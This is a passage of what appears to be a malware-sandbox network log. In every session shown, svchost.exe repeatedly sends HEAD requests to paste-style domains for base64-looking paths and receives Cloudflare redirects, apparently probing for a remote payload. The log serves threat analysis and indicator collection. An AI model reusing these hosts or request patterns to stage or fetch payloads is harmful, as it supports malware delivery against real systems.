                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3f12aad42e9-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1666&min_rtt=1666&rtt_var=833&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              73 | 192.168.2.7 | 50191 | 172.67.198.113 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:05.669898987 CET | 80 | OUT | HEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:06.141776085 CET | 862 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:06 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:06 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oW1IH5hwsTg%2B8GShIDHCVQGjhsy1LBApyRMMW7ilxTEBNYCQoLKnXI5RSJhqhJIodluSq3H9gCDEGqzguk%2FHI%2FbDNUypYz%2FoVMCbba5s49kcrH8YLVeKRBcNxdlOyaLK"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3f3088b728c-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1959&min_rtt=1959&rtt_var=979&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=164&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              74 | 192.168.2.7 | 50196 | 172.67.176.186 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:06.148360968 CET | 87 | OUT | HEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:06.601361036 CET | 875 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:06 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:06 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gmbJ3zWBdp0%2ByQFnQnOwQ9DLqZjV7TpwE%2BIAcTAHdWA0E7dm8%2FmblEd1HOSZzYdH7K6L8G4qKamRfwkIm994Pm16EE8czjcIDkrAjDlY%2BJ2%2BwtseCjTSX1jTeFnwJIJNR6dT"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3f5ee330fa3-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1692&min_rtt=1692&rtt_var=846&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              75 | 192.168.2.7 | 50202 | 188.114.97.3 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:06.338957071 CET | 86 | OUT | HEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:27:06.798424959 CET | 870 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:06 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:06 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cGHcYaCPYsru1DBpPtlOe880HY831HYmCv7PaHp%2FTuzrUHrz0zuJZ0mFxTykljgrREjZzfnihCqAptaG9hrm1GCvJIpgxCdW3zZOhiz8Hw5dHVTpkZlw5%2BpTL9v6n2Zerh4%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3f72e250fa7-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1707&min_rtt=1707&rtt_var=853&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              76 | 192.168.2.7 | 50205 | 104.21.64.1 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:06.607777119 CET | 91 | OUT | HEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:27:07.059945107 CET | 883 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:07 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:07 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=21Z%2FGee%2FrfTPM3R2y4CDiAAG9xvlhXmuTg3VTq%2BRzGi3%2BNT%2BAbGPnXpU2wHg%2FERy378DSwZszkGG3oPfXaDPEy6ldqt8GEdYj1%2FKW67krwlBVazhMoodeneBeeqHKk8ek6qF"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3f8ccb78ca1-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1871&min_rtt=1871&rtt_var=935&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=166&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              77 | 192.168.2.7 | 50207 | 172.67.198.113 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:06.804634094 CET | 80 | OUT | HEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:07.276124001 CET | 858 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:07 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:07 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SPNF0Z7zctrVM28WeH6dEVdpi7DGaFBv30R3FkSWVlKiMVqTQEwK4g9nRfzzs62BvV873QqPECE4iyDOmq5VMMI%2FmXFmz5zL%2BLtg8TYpEsWZqUTT9FuI32s3dV3EBXmf"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3fa1970c47f-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1654&min_rtt=1654&rtt_var=827&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              78 | 192.168.2.7 | 50214 | 172.67.176.186 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:07.282783985 CET | 87 | OUT | HEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:07.757966995 CET | 875 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:07 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:07 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XXbrNFOo%2FVFkt7QKoMA%2FFVAZKDNdjmzvc4OBSlQSSzW6BAfHjclKrtH0rkP9ZM%2F3KbddKLUgn6l1H6uOR4k7eDgqcJF%2FOdxRmUOHIGh3fRV8s58l9zISav3JoaatPuEt7n%2Fm"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3fd1cc26a55-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1588&min_rtt=1588&rtt_var=794&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              79 | 192.168.2.7 | 50216 | 188.114.97.3 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:07.542223930 CET | 86 | OUT | HEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:27:08.004745960 CET | 876 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:07 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:07 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=27DrOlNY%2B6%2BKoMwGbUSevVX73H8yEL5x9JOT7qmkg%2BVB6W5K7CwEMYkRS1F1zYMG8oNd7xisS8VUNZJd2sN4%2BPfIm3MTN008zoWaKvd53eQUdevA%2FFd6PD43LQDhoydb4Cg%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3fea859431f-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1593&min_rtt=1593&rtt_var=796&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              80 | 192.168.2.7 | 50218 | 104.21.64.1 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:07.764039040 CET | 91 | OUT | HEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:27:08.220923901 CET | 871 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:08 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:08 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QEg7V12U15afnM8JJnNpZbKhrtOS5E919l8F7SGvYfqIEBUrW%2BCfxrFOV4W2PUx1opatmQfHFM3fbUMy5nZfmA4sx8Md1OAJNL4fusNcTlEjGSukSaOviIHybHnZolt1cTdO"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc400193a8ca1-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1896&min_rtt=1896&rtt_var=948&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=166&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              81 | 192.168.2.7 | 50220 | 172.67.198.113 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:08.010873079 CET | 80 | OUT | HEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:08.464617014 CET | 866 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:08 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:08 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lXJ%2Fk4X13PqONHKd3bXSlGSFrkrukmGxPC3WVsUvN0gaCx%2BHD6VOe%2BEbZt2cR78Cwc5TfyWoaJBCLou9c7Igc63zVBZi%2BAaJTt%2FoAsgT8GzYwukzg7do2up5x8ISu3%2F8"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc4019c2b43e6-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1778&min_rtt=1778&rtt_var=889&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              82 | 192.168.2.7 | 50225 | 172.67.176.186 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:08.471474886 CET | 87 | OUT | HEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:08.957418919 CET | 874 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:08 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:08 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4Oek%2Fad3pvi61F7xtBtqdcvfsgKOql15XEU1VrUOy9LbUoBDrVtaIrDZodQ1A%2BAbwidv0zh2LUWtY7XrVb6E6j%2F79krAEr6eIlP5bpZ9MOBE%2FRm7q40pV9VP816wSuwkq6sD"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc4049de04331-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2310&min_rtt=2310&rtt_var=1155&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              83 | 192.168.2.7 | 50227 | 188.114.97.3 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:08.712117910 CET | 86 | OUT | HEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:27:09.185534000 CET | 874 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:09 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:09 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pi2P4L%2BBiw0zRXg7TVjamhW7leo0ow%2FNnOx04ucbnLg1Edk%2FDulYqkyCvUFXy6FYLmTCct0ePRPE8%2Fxo0txptg7Pi5bBQ3kjasEN0t6wAnVNSeKRHsUWp0U6w56KFr0ZEA8%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc4060e035e60-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1564&min_rtt=1564&rtt_var=782&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              84 | 192.168.2.7 | 50229 | 104.21.64.1 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:08.964114904 CET | 91 | OUT | HEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:27:09.422991037 CET | 882 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:09 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:09 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rdny66%2F4zn%2BgROP7UtezOWewiaXUGumLsTcl31Sri1UvY1miQ8LZhu6kabqLTqjVrGO71NSiTAXVg7LNN4S619d%2B2G2EYVSR4P5uWcOABpUI%2BF72CNUV2UAkixY%2FhA%2Fe4pBg"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc40798bede95-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2529&min_rtt=2529&rtt_var=1264&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              85 | 192.168.2.7 | 50231 | 172.67.198.113 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:09.191715956 CET | 80 | OUT | HEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:09.664475918 CET | 864 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:09 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:09 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DAUG06UTbRXjHxvxrMU8nzdSHGs7nhcfsg9ZJhlvTQ0whzpmM1qKS%2F%2FfiABCcYsCqkHy%2BQ7z6FdrkawISVlzPli5yf1KnMizOpjUY7XlcsSJaLj5G%2FekFTbENOt%2B0SbK"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc4090b3a5e6b-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1772&min_rtt=1772&rtt_var=886&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              86 | 192.168.2.7 | 50236 | 172.67.176.186 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:09.671133995 CET | 87 | OUT | HEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:10.129641056 CET | 877 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:10 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:10 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FzKQTGOFiEuWZQdvW%2BpOmFR7gBm8vDGOYSCeo5YE%2BUWd0Fj%2FCkaqbQGvBKnzbsX8q%2FQC7sY9arNehrmcferu6PIlXyaQYCM6HSV2Sr8%2FudyPYDDjh7lTI5%2BiW4UftZeLnwDi"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc40bfe8f7c7c-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1951&min_rtt=1951&rtt_var=975&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              87 | 192.168.2.7 | 50238 | 188.114.97.3 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:09.914673090 CET | 86 | OUT | HEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:27:10.387768030 CET | 878 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:10 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:10 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F5bN8ssLkH3KpdgobZkdJ8dOkIbbVHHpl%2B%2FaVlLCEHapdz1NFavMoTrTcLrWSYnMsA08SzD%2BrQ1dP3WjIJ%2FRqEGgUjX%2Fe7l2qadSEY8hB9kRXt6tzEiJkuIJLfPvc0wHGdQ%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc40d9bd9c407-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1505&min_rtt=1505&rtt_var=752&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=195&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              88 | 192.168.2.7 | 50240 | 104.21.64.1 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:10.136909008 CET | 91 | OUT | HEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:27:10.617371082 CET | 875 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:10 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:10 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JvSFnmTKG5Wv9aHBzANKTNBBLjc2VhKpoecP8j7b1aPwydeCZ%2B0iRNNaAHRP4aq4bXy3vEP%2Fmhtd4LpPrcooBcDA2nCez3D66AZCzoQyzb%2Bd3AKbd9pUefDZaC4cV9SklMYz"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc40efae34414-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1746&min_rtt=1746&rtt_var=873&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=178&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              89 | 192.168.2.7 | 50242 | 172.67.198.113 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:10.395867109 CET | 80 | OUT | HEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:10.850568056 CET | 862 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:10 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:10 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IX8edTRBYVzrLPiJlDGKiwwwEHffX2EAKfVQq23nDFKe9CzMWSKRq0sqOAoqLzy8s3KJqT2wLwtdC%2BynHSlubkYTzso3%2BSND%2F0DzaV46krImQ32I%2Bgc5rQVPJBssbM9G"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc410793818c0-EWR
                                                              alt-svc: h3=":443"; ma=86400
